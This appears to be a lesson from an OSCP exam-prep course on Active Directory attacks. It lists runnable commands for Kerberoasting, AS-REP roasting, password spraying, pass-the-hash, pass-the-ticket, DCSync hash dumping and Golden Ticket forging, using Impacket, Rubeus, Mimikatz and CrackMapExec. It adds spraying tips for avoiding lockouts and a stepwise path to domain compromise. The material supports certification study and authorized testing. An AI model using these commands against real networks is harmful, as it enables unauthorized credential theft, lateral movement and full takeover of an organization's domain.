Active Directory & Exam Simulation
Active Directory Attacks
5 min read
AD attacks are critical for OSCP. The AD set can be worth up to 40 points. Master these techniques to maximize your exam score.
Kerberoasting
Kerberoasting extracts service account TGS tickets that can be cracked offline.
How It Works
Kerberoasting Flow:
1. User requests TGS for service (SPN)
2. DC returns TGS encrypted with service account hash
3. Attacker extracts and cracks hash offline
4. Gain access as service account
Using Impacket (Linux)
# Request TGS for all SPNs
GetUserSPNs.py corp.local/user:password -dc-ip $DC -request
# Output to file
GetUserSPNs.py corp.local/user:password -dc-ip $DC -request -outputfile hashes.txt
# Crack with hashcat (mode 13100)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Using Rubeus (Windows)
# Kerberoast all users
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
# Crack with hashcat
hashcat -m 13100 hashes.txt rockyou.txt
Using PowerView
# Request TGS tickets
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash | Out-File hashes.txt
AS-REP Roasting
Targets accounts with "Do not require Kerberos preauthentication" enabled.
Finding Vulnerable Accounts
# From Linux - check without creds
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip $DC -format hashcat
# With creds - find all vulnerable
GetNPUsers.py corp.local/user:password -dc-ip $DC -request
From Windows
# Using Rubeus
.\Rubeus.exe asreproast /outfile:asrep.txt
# Using PowerView
Get-DomainUser -PreauthNotRequired
Cracking AS-REP Hashes
# Hashcat mode 18200
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Password Spraying
Test one password against many accounts to avoid lockouts.
Using CrackMapExec
# Spray single password
crackmapexec smb $DC -u users.txt -p 'Password123' --continue-on-success
# Check for valid accounts
crackmapexec smb $DC -u users.txt -p 'Summer2024!' --continue-on-success
Using Kerbrute
# Password spray via Kerberos
kerbrute passwordspray -d corp.local --dc $DC users.txt 'Password123'
Spray Strategy
Tips for Password Spraying:
├── Check password policy first (lockout threshold)
├── Wait between attempts (avoid lockouts)
├── Try seasonal passwords (Summer2024, Winter2024!)
├── Try company name variations
└── Try keyboard patterns (Qwerty123!)
Pass-the-Hash (PtH)
Use NTLM hashes without cracking them.
Using Impacket
# WMI execution
wmiexec.py -hashes :NTHASH corp.local/administrator@$TARGET
# PSExec
psexec.py -hashes :NTHASH corp.local/administrator@$TARGET
# SMBExec
smbexec.py -hashes :NTHASH corp.local/administrator@$TARGET
Using CrackMapExec
# Execute command with hash
crackmapexec smb $TARGET -u administrator -H NTHASH -x "whoami"
# Check admin access across network
crackmapexec smb $NETWORK/24 -u administrator -H NTHASH
Using Evil-WinRM
# Connect with hash
evil-winrm -i $TARGET -u administrator -H NTHASH
Pass-the-Ticket (PtT)
Use stolen Kerberos tickets for authentication.
Export Tickets (Windows)
# Using Rubeus
.\Rubeus.exe dump /nowrap
# Using Mimikatz
mimikatz# sekurlsa::tickets /export
Import and Use Tickets
# Rubeus pass-the-ticket
.\Rubeus.exe ptt /ticket:BASE64_TICKET
# Mimikatz
mimikatz# kerberos::ptt ticket.kirbi
# Verify
klist
From Linux
# Convert ticket format
ticketConverter.py ticket.kirbi ticket.ccache
# Use with Impacket
export KRB5CCNAME=ticket.ccache
psexec.py -k -no-pass corp.local/user@$TARGET
DCSync Attack
Extract password hashes directly from Domain Controller (requires DA or specific rights).
Using Mimikatz
# Dump all hashes
mimikatz# lsadump::dcsync /domain:corp.local /all /csv
# Dump specific user
mimikatz# lsadump::dcsync /domain:corp.local /user:administrator
Using Impacket
# Secretsdump with DA creds
secretsdump.py corp.local/administrator:password@$DC
# With hash
secretsdump.py -hashes :NTHASH corp.local/administrator@$DC
Golden Ticket Attack
Forge TGT using krbtgt hash for persistent domain access.
Requirements
Golden Ticket Requirements:
├── krbtgt NTLM hash (from DCSync)
├── Domain SID
├── Domain name
└── User to impersonate (typically Administrator)
Creating Golden Ticket
# Mimikatz
mimikatz# kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
# From Linux with ticketer.py
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local Administrator
# Use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@$DC
AD Attack Cheat Sheet
| Attack | When to Use | Tool |
|---|---|---|
| Kerberoasting | Have domain user | GetUserSPNs.py |
| AS-REP Roast | Users without preauth | GetNPUsers.py |
| Password Spray | Valid usernames | CrackMapExec |
| Pass-the-Hash | Have NTLM hash | wmiexec.py |
| DCSync | Have DA rights | secretsdump.py |
| Golden Ticket | Have krbtgt hash | ticketer.py |
OSCP AD Attack Flow
AD Attack Methodology:
1. Enumerate users, groups, SPNs
└── BloodHound, PowerView, ldapsearch
2. Kerberoast/AS-REP Roast
└── Crack hashes, get creds
3. Password spray if needed
└── CrackMapExec, kerbrute
4. Lateral movement with creds/hashes
└── PtH, PtT, evil-winrm
5. Escalate to Domain Admin
└── DCSync for persistence
6. Compromise Domain Controller
└── Golden ticket if needed
Next, we'll cover lateral movement techniques for moving through the AD environment. :::